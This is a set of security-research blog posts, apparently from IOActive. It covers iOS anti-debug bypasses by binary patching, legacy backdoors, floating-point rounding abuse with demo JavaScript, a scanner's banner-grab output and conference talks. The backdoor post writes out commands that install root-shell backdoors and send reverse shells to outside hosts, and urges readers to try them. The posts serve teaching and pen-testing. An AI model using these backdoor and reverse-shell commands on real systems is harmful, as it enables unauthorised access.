We hinted at this earlier, when we said that the ptrace() system call is used when debugging an application. Let’s examine one implementation often used by developers:
Figure 26: ptrace function declaration
 
Figure 27: ptrace implementation
 
See the references section for additional details and source of the above code snippet. If we run our modified binary on the device and try to debug it as we have been doing with gdb, we are presented with the following:
Figure 28: Unable to use gdb
We were stopped in our tracks. Also, keep in mind that the function was inlined and the binary stripped of symbols. Examining it in IDA reveals the following:

Figure 29: Disassembled binary with call to ptrace_ptr
Pay special attention to the highlighted area. Recall from earlier, we said function arguments are in registers R0-R3. The ptrace_ptr call takes four arguments the first being PT_DENY_ATTACH with a value of 31. The /usr/include/sys/ptrace.h header file reveals the list of possible values:
Figure 30: Snippet ptrace documentation
 
So what happens if we pass a value that is outside of the expected values? The parameter is set at 0000BDF2 and later passed as the parameter to ptrace_ptrat 0000BDFC. We see a value of 1F, which translates, to 31 in decimal. Lets update this to 0x7F.
Figure 31: Updating PT_DENY_ATTACH to random value
 
We copy the modified binary back to our device and have our bypass.
Figure 32: Bypassing PT_DENY_ATTACH
 
Another oft recommended technique for determining if a debugger is attached is the use of the sysctl()function. Now it doesn’t explicitly prevent a debugger from being attached, but it does return enough information for you to determine whether you are debugging the application. The code is normally a variation of the following:
Figure 33: Using sysctl()
When we run this from gdb, we get:
Figure 34: Output from running with sysctl()
Let’s pop this in IDA. Again the binary has been stripped and the checkDebugger function inlined.
Figure 35: Call to sysctl()
At 0000BE36we see the sysctl() function call and at 0000BE3A we see the comparison of register R0 to -1. If the call was not successful, then at 0000BE40 the program copies 1 to R0 before returning. That logic corresponds to:
Figure 36: Code snippet showing call to sysctl()
The fun begins when sysctl() was successful. We see the following snippet:
Figure 37: A look at the ternary operator
This corresponds to the following code snippet:
Figure 38: Ternary operator in our source code
When the application is being debugged/traced, the kernel sets the P_TRACED flag for the process where P_TRACED is defined in /usr/include/sys/proc.h as:
Figure 39: P_TRACED definition in /usr/include/sys/proc.h
 
So at 0000BE4Awe see the bitwise AND against this value. In effect, the loc_BE46 block corresponds to the above ternary operator in the return statement. What we want then is for this call to return 0.
If we change the instruction at 0000BE46 to a MOVS R0, 0 instead:
Figure 40: Patching the binary
 
When we run the program again we get
Figure 41: Successful bypass
 
Now, you may be asking, how did we know to update that specific instruction? Well, as we said, the loc_BE46 block corresponds to the use of the ternary operator in our code. Now don’t allow the compiler’s representation of the operator to confuse you. The ternary operator says if the process is being traced return 1 otherwise return 0. At 0000BE46 R0 is set to 1, and R0is also set at 0000BE5C.[EW1] However, in the latter case, the register is set in a conditional block. That block gets hit when the check returns 0. In other words, the process is not being traced. Let’s look at this in gdb. We will set a breakpoint at 0000BE5E, the point at which R0gets stored on the stack at [sp,#0x20].
Figure 42: Inspecting the R0 register
As you can see, R0has a value of 1, and this was set at 0000BE46 as discussed earlier. This value is then written to the stack and later accessed at 0000BE60 to determine if the process is being traced. We see the comparison against 0 at 0000BE62, and if it’s true, we take the path that shows we bypassed the debug check.
Figure 43: Reversing the binary
So, if we set a breakpoint at 0000BE60 and look what value was read from the stack, we see the following:
Figure 44: Examining the value in R0 that will be checked to determine if process is being debugged
This value(0x00000001) is the 1 that was copied to R0 earlier on. Hence, updating this to 0 helps achieve our goal.
Bringing down the curtains
Before we go, let’s revisit our very first example:
Figure 45: Revisiting first example
Recall we modified the isJailBroken function by setting register R0 to 0. However, there is a much simpler way to achieve our objective, and some of you would have already picked it up. The instruction at 0000BE28 is BEQ (branch if eq), so all we really need to do is change this to an unconditional jump to loc_BE3C. After the modification we end up with:
Figure 46: Updated conditional jump to unconditional jump
And we are done, however, we had to take the long scenic route first.
 
Conclusion
As we demonstrated, each time the developer added a new measure, we were able to bypass it. This however does not mean that the measures were completely ineffective. It just means that developers should implement these and other measures to guard against this type of activity. There is no silver bullet.
From a pen tester’s stand point, it comes down to time and effort. No matter how complex the function, at some point it has to return a value, and it’s a matter of finding that value and changing it to suit our needs.
Detecting jailbreaks will continue to be an interesting topic. Remember, however, that an application running at a lower privilege can be tampered with by one that is at a higher privilege. A jailbroken device can run code in kernel-mode and can therefore supply false information to the application about the state of the device.
Happy hacking.
 
References:
  1. http://www.amazon.com/The-Mobile-Application-Hackers-Handbook/dp/1118958500
  2. http://www.amazon.com/Practical-Reverse-Engineering-Reversing-Obfuscation/dp/1118787315
  3. http://www.amazon.com/Hacking-Securing-iOS-Applications-Hijacking/dp/1449318746
  4. https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet
  5. https://www.theiphonewiki.com/wiki/Bugging_Debuggers
  6. http://www.opensource.apple.com/source/xnu/xnu-792.13.8/bsd/sys/ptrace.h
INSIGHTS | September 8, 2015

The Beauty of Old-school Backdoors

Currently, voodoo advanced rootkit techniques exist for persistence after you’ve got a shell during a pen test. Moreover, there are some bugdoorsimplemented on purpose by vendors, but that’s a different story. Beautiful techniques and code are available these days, but, do you remember that subtle code you used to use to sneak through the door? Enjoy that nostalgia by sharing your favorite one(s) using the #oldschoolbackdoors on social networks.

 

In this post, I present five Remote Administration Tools (RATs) a.k.a. backdoors that I personally used and admired. It’s important to mention that I used these tools as part of legal pen testing projects in order to show the importance of persistence and to measure defensive effectiveness against such tools.
1. Apache mod_rootme backdoor module (2004)

“mod_rootme is a very cool module that sets up a backdoor inside of Apache where a simple GET request will allow a remote administrator the ability to grab a root shell on the system without any logging.”

 

One of the most famous tools only required you to execute a simple makecommand to compile the shared object, copy it into the modules directory, insert “LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so” into httpd.conf, and restart the httpd daemon with ‘apachectl stop; apachectl start’. After that, a simple “GET root” would give you back a w00t shell.

 

2. raptor_winudf.sql – A MySQL UDF backdoor (2004–2006)

“This is a MySQL backdoor kit based on the UDFs (User Defined Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port 80/tcp) or to execute single OS commands (exec UDF).”

 

For this backdoor, you used a simple ‘#mysql -h x.x.x.x < raptor_winudf.sql’to inject the backdoor as a user-defined function. From there, you could execute commands with ‘mysql> select exec(‘ipconfig > c:out.txt’);’ from the MySQL shell.

 

A cool reverse-shell feature was implemented as well and could be called with ‘mysql> select netcat(‘y.y.y.y’);’ in order to send an interactive shell to port 80 on the host supplied (y.y.y.y). The screenshot below shows the variant for Linux.

Screenshot source:
http://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ (no longer active)
 
3. Winamp get_wbkdr.dll plugin backdoor (2006)

“wbkdr is a proof of concept Winamp backdoor that makes use of the plugin interface. It spawns cmd.exe on port 24501.”

 

This one was as easy as copying the DLL into C:Program FilesWinampPlugins and playing your favorite song with Winamp in order to get a pretty cmd.exeattached to the port 24501.

 

4. BIND reverse shell backdoor (2005)
This backdoor used an unpublished patch for BIND, the most used DNS daemon on the Internet, developed by a friend of mine from Argentina. Basically you had to patch the source, compile and run named, as root normally. Once running, sending a DNS request with ‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ would trigger a reverse shell to the host x.x.x.x on the port given.
5. Knock-out – a port-knocking based backdoor (2006)

This is backdoor I made using libpcap for packet sniffing (server) and libnet for packet crafting (client). I made use of the port-knocking technique to enable the backdoor, which could be a port bind or a reverse shell. The server and client use the same configuration file to determine which ports to knock and the time gap between each network packet sent. Knock-out supports TCP and UDP and is still working on recent Linux boxes (tested under Ubuntu Server 14.04).

 

I’d say most of these backdoors still work today. You should try them out. Also, I encourage you to share the rarest backdoors you ever seen, the ones that you liked the most, and the peculiar ones you tried and fell in love with. Don’t forget to use the #oldschoolbackdoors hashtag ;-).

INSIGHTS | August 25, 2015

Money may grow on trees

Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.

 

Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
 
Lack of precision in numbers

IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.

 

The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).

 

We will explore what happens when inexact floating point exceptions are triggered. The rounded result of a valid operation can be different from the real (and sometimes infinitely precise) result and certain operations may go unnoticed.
 
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:

 

To exemplify this matter, this is how the number 0.1 looks internally in Python:

 

The decimal value 0.1 cannot be represented precisely when using binary notation, since it is an infinite number in base 2. Python will round the previous number to 0.1 before showing the value.
 
Salami slicing the decimals

Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.

 

Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:

 

Perhaps we could take some of those decimals without JavaScript noticing:

 

 

 

But what happens if we are greedy? How much can we take without JavaScript noticing?

 
 
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0)
    return 1; // Error! The account can not have a negative balance
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print(“——————————————–“);
  print(” The balance of the bank accounts is:”);
  print(” Account 0: “+account[0]+” u$s”);
  print(” Account 1: “+account[1]+” u$s (profit)”);
  print(” Overall money: “+(account[0]+account[1]))
  print(“——————————————–“);
  if(typeof time !== ‘undefined’) {
     print(” Estimated daily profit: “+( (60*60*24/time) * account[1] ) );
     print(“——————————————–“);
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // I will save my profit here 
}
 
account = new Array();
initial_deposit = 1000000;
profit = 0
print(“n1) Searching for the best profit”);
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
  reset_values();
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if(account[0]==initial_deposit && i>profit) {
    profit = i;
 //   print(“I can grab “+profit.toPrecision(21));
  } else {
    break;
  }
}
print(”   Found: “+profit.toPrecision(21));
print(“n2) Let’s start moving some money:”);
 
reset_values();
 
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 

The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are we taking: the higher the value, the higher the amount of decimals. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits to a secondary Account 1:

 

Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.

 

Another possibility to abuse the loss of precision is what happens when dealing with large numbers. The problem becomes visible when using at least 17 digits.
 

Now, the sample attack application will occur on a crypto currency, fakecoin.js:

 

 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0) {
    return 1; // Error! The account can not have a negative balance
  }
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print(“————————————————-“);
  print(” The general balance is:”);
  print(” Crypto coin:  “+crypto_coin);
  print(” Crypto value: “+crypto_value);
  print(” Crypto cash:  “+(account[0]*crypto_value)+” u$s”);
  print(” Account 0: “+account[0]+” coins”);
  print(” Account 1: “+account[1]+” coins”);
  print(” Overall value: “+( ( account[0] + account[1] ) * crypto_value )+” u$s”)
  print(“————————————————-“);
  if(typeof time !== ‘undefined’) {
     seconds_in_a_day = 60*60*24;
     print(” Estimated daily profit: “+( (seconds_in_a_day/time) * account[1] * crypto_value) +” u$s”);
     print(“————————————————-n”);
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // profit
}
 
// My initial money
initial_deposit = 10000000000000000;
crypto_coin = “Fakecoin”
crypto_value = 0.00000000011;
 
// Here I have my bank accounts defined
account = new Array();
 
print(“n1) Searching for the best profit”);
profit = 0
for (j = 1; j < initial_deposit; j+=1) {
  reset_values();
  wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
  if(account[0]==initial_deposit && j > profit) {
    profit = j;
  } else {
    break;
  }
}
print(”   Found: “+profit);
reset_values();
start = new Date().getTime() / 1000;
print(“n2) Let’s start moving some money”);
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 
 
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at the time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin from Account 0, and will allow us to profit a total of approximately $2,300 USD per day:

Depending on the implementation, a hacker can used either float numbers or large numbers to generate money out of thin air.
 
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
  • If you rely on values that use decimal numbers, use specialized variables like BigInteger in Java.
  • Do not allow values larger than 16 digits to be stored in variables and truncate decimals, or
  • Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).

 

INSIGHTS | July 30, 2015

Saving Polar Bears When Banner Grabbing

As most of us know, the Earth’s CO2 levels keep rising, which directly contributes to the melting of our pale blue dot’s icecaps. This is slowly but surely making it harder for our beloved polar bears to keep on living. So, it’s time for us information security professionals to help do our part. As we all know, every packet traveling over the Internet is processed by power hungry CPUs. By simply sending fewer packets, we can consume less electricity while still get our banner grabbing, and subsequently our work, done.

 
But first a little bit of history. Back in the old days, port scanners were very simple. Some of the first scanners out there were probe_tcp_ports (published in Phrack #46) and pscan.c by pluvius. The first scanner I found that actually managed to use non-blocking I/O was strobe written by Proff, more commonly known nowadays as Julian Assange, somewhere in 1995. Using non-blocking I/O obviously made it a lot faster.
 
In 1996, scantcp.c written by Uriel Maimon (published in Phrack #49) became one of the first scanners to use half-open/SYN scanning. This was followed by the introduction of nmap by Fyodor Lyon in The Art of Port Scanning (published in Phrack #51) in 1997.
 
Of course, any security person worth his salt knows nmap and is at least familiar with a good subset of the myriad of scanning techniques it implements. But, in many cases, when scanning for TCP ports we want results as quickly as possible, so we can get a list of open ports we can connect to from the source address that we’re scanning and subsequently identify the services behind those ports.
 
To determine if a port is open, we sent out a SYN packet and watch for one of several things to happen. Assuming there are no firewalls or routing issues, the receiving TCP/IP stack will either:
  •  Send a packet with the RST flag set, which means the port is closed and the host is not accepting connections on that port.
  • Send a packet with the SYN and ACK flags set, which means the host is accepting the connection. The Operating System under which nmap runs doesn’t know anything about the outgoing SYN packet (as it was created in raw mode), and subsequently it will send back an RST packet as a reply.

 
To summarize see the following image from (courtesy of the nmap book)
 
 
This is great, as we can now list the open ports, and this forms the basis of half-open/SYN scanning. However, one thing that nmap does is track the number of outstanding probes and retransmit them a number of times if no response is received in a timely fashion. This leads to a lot of complexity, and it makes scanning slower too. Besides that, standard scanning modes do not offer protection against an adversary who is feeding wrong responses down the pipe. So nmap can, under such circumstances, claim that a port is open when it is not, or vice versa.
 
This lead to some efforts to protect the outgoing SYN probes by cryptographically signing them. The first known public release of this was scanrand by Dan Kaminsky introduced in his collection of Paketto Kereitsu utilities. It generates and fires off packets as quickly as possible. Each SYN probe is protected by a cryptographic cookie based on an HMAC calculated over the 4-tuple identifying the connection (the source and destination IP addresses and ports) and a randomly generated secret. As a valid reply for an open port needs to be sent back with an incremented TCP ACK value, it’s easy to recalculate the original cookie and deduce if it was indeed a response to a packet sent out by the scanner. This completely eliminates the need to keep state, although a bit of packet loss can mean some probes may get lost and won’t be retransmitted, and as such not all open ports will be discovered.
 
So that’s all great. But what’s one of the first things we do after discovering an open port? Connect to it properly. Possibly to do a banner grab or a version scan or just to see what the heck is behind this port. Now when it comes to standard IANA port assignments, in most cases, it’s relatively clear what’s behind a port. If open, port 22 is most likely SSH, port 80 HTTP, port 143 IMAP etc. But we still want to check.
 
So what happens if you do an nmap version scan? Or a simple banner grab after a port scan? After receiving a SYN|ACK reply from an open port, the scanner jots down that the port is open, and then connects to it. The only way to do this is to go through libc and the kernel and do a full TCP connect() call. This will result in another SYN – SYN|ACK – ACK exchange on the wire before any data can actually be exchanged. Combining that with the original SYN – SYN|ACK – RST exchange, that’s a total of three potentially unnecessary packets being exchanged.
 
So how would one go about solving this? There are a few approaches. One is by patching the host kernel and enabling an API that allows us to send out raw SYN probes without keeping any state. By then adding a callback API when valid SYN|ACK packets are received, we would have a mechanism to turn these connections into valid file descriptors. But that means writing a lot of complicated kernel code.
 
The other approach is to use a userland TCP/IP stack. These work exactly the same as any normal TCP/IP stack, but they just run in userspace. That makes it easier to integrate them into scanners and modify them without having to deal with complicated custom kernel modules.
 
As I wrote several scanners over the years, I always wanted to have a good userland TCP/IP stack, but I never saw one that fit my needs or whose code quality I actually liked. And writing one myself seemed like a lot of work, so I shied away from it.
 
Anyhow, ever seen the movie American Beauty? Where Kevin Spacey’s wife comes home and asks him about the 1970 Pontiac Firebird out on the driveway which he bought with the money received from blackmailing his former boss? It’s such a great scene; “the car I’ve always wanted and now I have it. I rule”.
 
 
That’s sort of how I felt when I stumbled over Patrick Kelsey’s libuinet. The userland TCP/IP stack I’ve always wanted and now I have it. I rule!! It’s a port of the FreeBSD TCP/IP stack with kernel paradigms ported back on userland libraries, such as POSIX threads. It’s great, and with a bit of fiddling, I got it to work on Linux too.
 
That enabled me to combine the two ideas into just one port scanner; the stateless SYN scanning first introduced in scanrand and the custom TCP/IP stack. Now I can immediately resume doing a banner grab or sending a request without having to do another TCP connect() call. To prevent the hosting Linux kernel from interfering and sending a RST packet, an iptables firewall rule will be inserted. Otherwise, the userland TCP/IP stack will try to pick up the connection from the SYN|ACK but then the Linux kernel has already frontran it and will have sent the RST out. After this was figured out, tying everything else together in the tool was relatively easy, thus, polarbearscan was born.
 
The above approach saves us from sending a couple of packets. And thus saves CPU cycles. And so we can hopefully give the polar bears a few more years. The code for the polarbear scanner can be found here,and instructions on how to compile it and get it up and running on Linux systems are inside in the README in the distribution.
 
A sample run of the tool doing a standard banner grab for port 21, 22, 143 (FTP, SSH, IMAP) with a bandwidth limitation for outgoing SYN probes of just 10kbps and scanning a /20 range will yield something like this:
 
$ sudo ./pbscan -10k –sB –p21,22,143 x.x.x.x/20
 

seed: 0xb21f7f4e, iface: eth0, src: 10.0.2.15 (id: 54321, ttl: 64, win: 65535)
x.x.x.6:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.6:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:21 (t/o: 0s)
x.x.x.6:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.8:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.15:21 (t/o: 0s)
x.x.x.16:21 (t/o: 0s)
x.x.x.8:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.9:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.8:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.10:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.10:21 -> 220 ProFTPD 1.3.5 Server ready.
x.x.x.9:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.9:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.17:21 (t/o: 0s)
x.x.x.11:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.10:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.7:21 -> 220 Core FTP Server Version 1.2, build 369 Registered
x.x.x.11:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.13:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.13:21 -> 220 ProFTPD 1.3.4d Server ready.
x.x.x.13:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.15:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.16:22 -> SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
x.x.x.18:22 -> SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze5
x.x.x.19:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.19:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.17:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.
x.x.x.21:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.22:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.25:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.25:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.26:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.27:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.26:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.27:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.36:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.36:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.38:22 -> SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
x.x.x.40:22 -> SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
x.x.x.17:22 (t/o: 5s)
x.x.x.35:22 (t/o: 5s)
x.x.x.37:22 (t/o: 5s)
x.x.x.239:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-5
x.x.x.100:22 (t/o: 5s)
x.x.x.124:22 (t/o: 6s)
x.x.x.242:22 (t/o: 5s)

The tool also has the ability to do more than a passive banner grab. It includes other scan modes in which it will try to identify TLS servers by sending it a TLS NULL probe and identify HTTP servers.
Enjoy!

EDITORIAL | July 29, 2015

Black Hat and DEF CON: Hacks and Fun

The great annual experience of Black Hat and DEF CON starts in just a few days, and we here at IOActive have a lot to share. This year we have several groundbreaking hacking talks and fun activities that you won’t want to miss!

For Fun
Join IOActive for an evening of dancing

Our very own DJ Alan Alvarez is back – coming all the way from Mallorca to turn the House of Blues RED. Because no one prefunks like IOActive.
Wednesday, August 5th
6–9PM
House of Blues
Escape to the IOAsis – DEF CON style!
We invite you to escape the chaos and join us in our luxury suite at Bally’s for some fun and great networking.  
Friday, August 7th12–6PM
Bally’s penthouse suite
·      Unwind with a massage 
·      Enjoy spectacular food and drinks 
·      Participate in discussions on the hottest topics in security 
·      Challenge us to a game of pool! 
FREAKFEST 2015
After a two year hiatus, we’re bringing back the party and taking it up a few notches. Join DJs Stealth Duck, Alan Alvarez, and Keith Myers as they get our booties shaking. All are welcome! This is a chance for the entire community to come together to dance, swim, laugh, relax, and generally FREAK out!
And what’s a FREAKFEST without freaks? We are welcoming the community to go beyond just dancing and get your true freak on.
Saturday, August 8th
10PM till you drop
Bally’s BLU Pool
For Hacks
Escape to the IOAsis – DEF CON style!
Join the IOActive research team for an exclusive sneak peek into the world of IOActive Labs. 
Friday, August 7th
12–6PM
Bally’s penthouse suite
 
Enjoy Lightning Talks with IOActive Researchers:
Straight from our hardware labs, our brilliant researchers will talk about their latest findings in a group of sessions we like to call IOActive Labs Presents:
·      Mike Davis & Michael Milvich: Lunch & Lab – an overview of the IOActive Hardware Lab in Seattle
Robert Erbes: Little Jenny is Export Controlled: When Knowing How to Type Turns 8th-graders into Weapons 
·      Vincent Berg: The PolarBearScan
·      Kenneth Shaw: The Grid: A Multiplayer Game of Destruction 
·      Andrew Zonenberg: The Anti Taco Device: Because Who Doesn’t Go to All This trouble? 
·      Sofiane Talmat: The Dark Side of Satellite TV Receivers 
·      Fernando Arnaboldi: Mathematical Incompetence in Programming Languages 
·      Joseph Tartaro: PS4: General State of Hacking the Console
·      Ilja Van Sprundel: An Inside Look at the NIC Minifilter
 
RSVP at https://www.eventbrite.com/e/ioactive-las-vegas-2015-tickets-17604087299
 
Black Hat/DEF CON
 
Speaker: Chris Valasek
Remote Exploitation of an Unaltered Passenger Vehicle
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 2PM Saturday, August 8, 2015
In case you haven’t heard, Dr. Charlie Miller and I will be speaking at Black Hat and DEF CON about our remote compromise of a 2014 Jeep Cherokee (http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/). While you may have seen media regarding the project, our presentation will examine the research at much more granular level. Additionally, we have a few small bits that haven’t been talked about yet, including some unseen video, along with a 90-page white paper that will provide you with an abundance of information regarding vehicle security assessments. I hope to see you all there!
Speaker: Colin Cassidy
Switches get Stitches
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 4PM Saturday, August 8, 2015
Have you ever stopped to think about the network equipment between you and your target? Yeah, we did too. In this talk we will be looking at the network switches that are used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation. In other words: DCS, PCS, ICS, and SCADA switches.
We’ll be attacking the management plane of these switches because we already know that most ICS protocols lack authentication and cryptographic integrity. By compromising the switches an attacker can perform MITM attacks on a live processes.

Not only will we reveal new vulnerabilities, along with the methods and techniques for finding them, we will also share defensive techniques and mitigations that can be applied now, to protect against the average 1-3 year patching lag (or even worse, “forever-day” issues that are never going to be patched).

 

Speaker: Damon Small
Beyond the Scan: The Value Proposition of Vulnerability Assessment
DEF CON: 2PM Thursday, August 6, 2015
It is a privilege to have been chosen to present at DEF CON 23. My presentation, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, is not about how to scan a network; rather, it is about how to consume the data you gather effectively and how to transform it into useful information that will affect meaningful change within your organization.
As I state in my opening remarks, scanning is “Some of the least sexy capabilities in information security”. So how do you turn such a base activity into something interesting? Key points I will make include:
·      Clicking “scan” is easy. Making sense of the data is hard and requires skilled professionals. The tools you choose are important, but the people using them are critical.
·      Scanning a few, specific hosts once a year is a compliance activity and useful only within the context of the standard or regulation that requires it. I advocate for longitudinal studies where large numbers of hosts are scanned regularly over time. This reveals trends that allow the information security team to not only identify missing patches and configuration issues, but also to validate processes, strengthen asset management practices, and to support both strategic and tactical initiatives.

I illustrate these concepts using several case studies. In each, the act of assessing the network revealed information to the client that was unexpected, and valuable, “beyond the scan.”

 

Speaker: Fernando Arnaboldi
Abusing XSLT for Practical Attacks
Black Hat: 3:50PM Thursday, August 6, 2015
DEF CON: 2PM Saturday, August 8, 2015
XML and XML schemas (i.e. DTD) are an interesting target for attackers. They may allow an attacker to retrieve internal files and abuse applications that rely on these technologies. Along with these technologies, there is a specific language created to manipulate XML documents that has been unnoticed by attackers so far, XSLT.

XSLT is used to manipulate and transform XML documents. Since its definition, it has been implemented in a wide range of software (standalone parsers, programming language libraries, and web browsers). In this talk I will expose some security implications of using the most widely deployed version of XSLT.

 

Speaker: Jason Larsen
Remote Physical Damage 101 – Bread and Butter Attacks

Black Hat: 9AM Thursday, August 6, 2015

 

Speaker: Jason Larsen
Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion

DEF CON:  6PM Friday, August 7, 2015

 

Speaker: Kenneth Shaw
The Grid: A Multiplayer Game of Destruction
DEF CON: 12PM Sunday, August 9, 2015, IoT Village, Bronze Room

Kenneth will host a table in the IoT Village at DEF CON where he will present a demo and explanation of vulnerabilities in the US electric grid.

 

Speaker: Sofiane Talmat
Subverting Satellite Receivers for Botnet and Profit
Black Hat: 5:30PM Wednesday, August 5, 2015
Security and the New Generation of Set Top Boxes
DEF CON: 2PM Saturday, August 8, 2015, IoT Village, Bronze Room
New satellite TV receivers are revolutionary. One of the devices used in this research is much more powerful than my graduation computer, running a Linux OS and featuring a 32-bit RISC processor @450 Mhz with 256MB RAM.

Satellite receivers are massively joining the IoT and are used to decrypt pay TV through card sharing attacks. However, they are far from being secure. In this upcoming session we will discuss their weaknesses, focusing on a specific attack that exploits both technical and design vulnerabilities, including the human factor, to build a botnet of Linux-based satellite receivers.

 

Speaker: Alejandro Hernandez
Brain Waves Surfing – (In)security in EEG (Electroencephalography) Technologies
DEF CON: 7-7:50PM Saturday, August 8, 2015, BioHacking Village, Bronze 4, Bally’s

